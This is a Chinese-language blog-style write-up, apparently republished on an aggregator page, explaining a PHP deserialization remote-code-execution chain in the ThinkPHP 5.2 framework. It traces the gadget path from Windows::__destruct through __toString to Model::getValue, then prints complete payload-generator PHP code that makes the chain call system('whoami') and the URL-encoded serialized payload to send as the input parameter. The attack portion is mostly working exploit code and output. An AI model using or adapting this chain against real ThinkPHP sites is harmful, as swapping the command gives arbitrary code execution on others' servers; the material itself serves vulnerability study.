当前位置: 首页 > news >正文

thinkphp5.2反序列化

thinkphp思路:

1、确认thinkphp版本 2、查找入口点 3、输入点分析 4、敏感函数定位 5、pop链构造 6、利用与验证

以下事例主要以thinkphp5.2为例:

1、确认thinkphp版本

方法一:网页版本直接确认

方法二: 在composer.lock文件下查看

2、查找入口点(进入某个功能模块的“入口路径)

我是通过全局查找public function index发现的,入口点是/index/index

3、输入点分析

在上述图片中可判定输入点是input,并且并没有对input有限制,这一点很危险,并且对input传入的值直接进行了反序列化。

4、敏感函数定位

方法一:数据流追踪思路(看方法下面还有没有跟方法,有继续跟,没有则切换)
方法二:从 sink 往回追(找到危险函数,然后一步步往上看可控点)
重点查找__destruct() __wakeup() __toString() __call()看這些魔术方法,或者查找一些危险函数比如system() unlink() eval() file_put_contents()之类的。
我是在查找__destruct的时候,发现这个下面有removeFiles()这个方法,继续跟进

发现他调用了一个判断file_exists()的方法,通过查找官方文档得知,这个方法会调用一个echo,因此会使用到__tostring方法,因此跟进(这里将files的值赋给了filename,且files的类型是数组)


__toString()又調用了toJson()继续跟进
它里面调用了toArray()跟进

跟进toArray()则发现getAttr()继续

跟进发现getData()getValue()$namegetAttr($key)中key的值,又在getData中将name的值给$value

继续跟进getData()发现getRealFieldName()和array_key_exists(),其中array_key_exists()是数组中是否中存在指定键名(getData()中输出了value的值)

跟进发现里面是判断严格模式开关是否开启,开启则true,因此这里是原名输出

回到getAttr()跟进getValue()(其中name value在getData()中被赋值)跟进

跟进到getValue()发现触发点$value = $closure($value, $this->data);并且根据上述分析,发现$value、this->$data、$closure都是可控的,因此可以构造类似system(whoami,[])之类的,即使第二个参数为空也可以执行
$value的值是由getData()最终返回的值
$closure的是值是由withAttr数组中取出来的
this->$data的值是由模型属性控制的

5、pop链构造

__destruct---->removeFiles()—>file_exists()—>__toString()—>toJson()—>toArray()—>getAttr()—>getValue
其次找出里面所使用过的变量之后开始写payload:

<?namespacethink\process\pipes{classWindows{private$files=[];function__construct($files){$this->files=$files;}}}namespacethink\model\concern{traitConversion{protected$visible;}traitRelationShip{private$relation;}traitAttribute{private$withAttr;private$data;}}namespacethink{abstractclassModel{usemodel\concern\RelationShip;usemodel\concern\Conversion;usemodel\concern\Attribute;function__construct($closure){$this->data=$closure;$this->relation=[];$this->visible=[];$this->withAttr=array("paper"=>'system');}}}namespacethink\model{classPivotextends\think\Model{function__construct($closure){parent::__construct($closure);}}}namespace{$pivot=newthink\model\Pivot(['paper'=>'whoami']);$windows=newthink\process\pipes\Windows([$pivot]);echourlencode(serialize($windows));}?>

6、利用与验证

urlencode之后的序列化编码:
O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel%00relation%22%3Ba%3A0%3A%7B%7Ds%3A10%3A%22%00%2A%00visible%22%3Ba%3A0%3A%7B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A5%3A%22paper%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A5%3A%22paper%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D%7D%7D
随后在给input传入

http://www.jsqmd.com/news/928791/

相关文章:

  • 2026 南宁手表回收全攻略,添价收手表回收教你科学处理闲置名表 - 薛定谔的梨花猫
  • AI教父Hinton声称AI已具意识,为何却被说成不如教皇懂AI?
  • Unity TextMeshPro 3.2.x Pre-Release版本导入避坑指南:如何正确获取并配置Emoji Sprite Asset
  • 学习C#调用OpenXml操作word文档的基本用法(39:学习表格类-1)
  • 如何轻松实现跨平台输入法词库迁移:深蓝词库转换终极指南
  • go swagger转html
  • SVN 分支管理详解
  • 3个关键突破:用Blender 3MF插件重塑你的3D打印工作流
  • 2026年执行律师深度测评:如何为你的胜诉回款匹配最佳方案? - 资讯快报
  • Claude 深度技术解析:从宪法 AI 到百万级上下文的架构革命
  • 魔兽争霸3终极优化教程:5分钟免费解锁高帧率与宽屏体验
  • ncmdumpGUI:Windows平台NCM音频格式转换的完整集成实战应用
  • 烟威地区废旧设备拆除回收:合规服务助力工业设备更新处置 - 人间发现
  • 2026年合肥餐饮工装/烘焙店装修/茶饮店设计/美妆店整装/奢侈品门店装修推荐——三大品牌实力榜单 - 资讯快报
  • 欧盟AI法案深度解析:风险分级监管、合规挑战与企业应对策略
  • AI 圈四大术语通俗讲透:CLI、GUI、MCP、Skills,看完秒懂 2026 年终端革命
  • 告别重复检测!DINO的对比去噪训练,如何让模型学会‘精准排雷’?
  • 告别哑巴NPC!用RT-Voice PRO 2023.1.0为你的Unity游戏注入灵魂语音(附完整代码示例)
  • 【Gemini推送转化率翻倍计划】:基于17个高DAU应用的A/B测试数据,教你用3个配置参数+1个Hook拦截点重构通知生命周期
  • 宇视VM实况组显示功能配置指导
  • 【信息科学与工程学】【安全领域】 第八十八篇 网络空间安全18
  • RK3568开发板Maskrom模式进入全攻略:不止UPDATE键,还有音量-和复位键怎么用?
  • 2026长春二手机哪家好?手机店哪家最靠谱?实测体验TOP3 - 博客万
  • Omniapp:AI与区块链融合的DApp平台与OMP代币经济解析
  • 3.47 室内环境下全向成像孪生神经网络机器人定位的实验评价
  • 避坑指南:YOLOv8训练自定义数据集时,为什么你的‘小球’总是检测不准?
  • ppt里面有时候输入法无法输入中文,只能输入英文,采用切换按键也不行——只有关闭ppt重新打开才可以解决问题,这是什么原因?
  • 树莓派与OpenCV:构建家庭AIoT智能系统的核心技术与实践
  • CFD几何建模软件
  • Joy-Con Toolkit:如何快速掌握Switch手柄调试与个性化定制的终极指南